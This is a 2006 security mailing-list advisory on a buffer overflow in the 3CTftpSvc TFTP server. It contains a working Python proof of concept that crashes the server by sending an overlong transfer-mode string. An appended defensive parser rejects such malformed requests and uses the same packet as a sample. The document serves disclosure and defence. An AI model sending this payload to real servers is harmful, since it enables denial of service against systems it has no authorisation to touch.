Network Security Vuln-Dev

Subject: TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode)
Date: 26 Nov 2006 12:31:48 -0000
TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long transporting mode)

------------------------------------------------------------------
SUMMARY:

3CTftpSvc TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
(http://support.3com.com/software/utilities_for_windows_32_bit.htm 
or ftp://ftp.3com.com/pub/utilbin/win32/3CTftpSvc.zip) 
It provides an implementation of the TFTPv2 protocol.

A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be 
exploited by attackers to execute arbitrary commands or cause a denial of 
service. This flaw is due to a buffer overflow error when handling an overly 
long transporting mode (more than 470 bytes) passed to a "GET" or "PUT" 
command, which could be exploited by malicious users to compromise a vulnerable 
system or crash an affected application.
----------
DETAILS:

 Vulnerable systems: 3CTftpSvc TFTP Server 2.0.1 and probably prior versions
 
Exploit:

#!/usr/bin/python
# Buffer Overflow (Long transporting mode) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

import socket
import sys

host = '192.168.1.11'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except: 
    print "socket() failed"         
    sys.exit(1)

filename = "A" 
mode = "netascii" + "A" * 469
da = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(da, (host, port))

------------------------------------------
Liu Qixu
NCNIPC
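
Added example, not part of the original advisory and not 3Com's code: a defender-side check that parses a TFTP read/write request using the RFC 1350 layout and rejects any request whose transfer mode is not one of the defined modes, which covers the overlong mode field described above. The function name, verdict strings and sample packets are constructed for illustration.

```python
import struct

# Transfer modes defined by RFC 1350; comparison is case-insensitive.
VALID_MODES = {b"netascii", b"octet", b"mail"}
REQUEST_OPCODES = {1: "RRQ", 2: "WRQ"}


def inspect_tftp_request(payload: bytes):
    """Return (verdict, reason) for one UDP payload addressed to port 69."""
    if len(payload) < 4:
        return ("reject", "truncated packet")
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in REQUEST_OPCODES:
        return ("ignore", "not a read/write request")
    # Layout: filename NUL mode NUL, optionally followed by
    # option NUL value NUL pairs (RFC 2347).
    fields = payload[2:].split(b"\0")
    if len(fields) < 3 or fields[-1] != b"":
        return ("reject", "missing NUL terminator")
    filename, mode = fields[0], fields[1]
    if not filename:
        return ("reject", "empty filename")
    if mode.lower() not in VALID_MODES:
        # An allow-list also bounds the length: no valid mode exceeds 8 bytes.
        return ("reject", "%s with invalid mode field of %d bytes"
                % (REQUEST_OPCODES[opcode], len(mode)))
    return ("accept", "%s mode=%s" % (REQUEST_OPCODES[opcode],
                                      mode.decode("ascii")))


if __name__ == "__main__":
    # Constructed sample payloads, not captured traffic.
    samples = [
        b"\x00\x01boot.img\x00octet\x00",                     # normal read
        b"\x00\x01A\x00NetASCII\x00blksize\x001024\x00",      # with option
        b"\x00\x02A\x00" + b"netascii" + b"A" * 469 + b"\x00",  # overlong mode
        b"\x00\x01A\x00octet",                                # unterminated
    ]
    for pkt in samples:
        print(inspect_tftp_request(pkt))
```

The same allow-list logic can sit in a UDP proxy in front of the server or be applied to packet captures when hunting for malformed requests.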
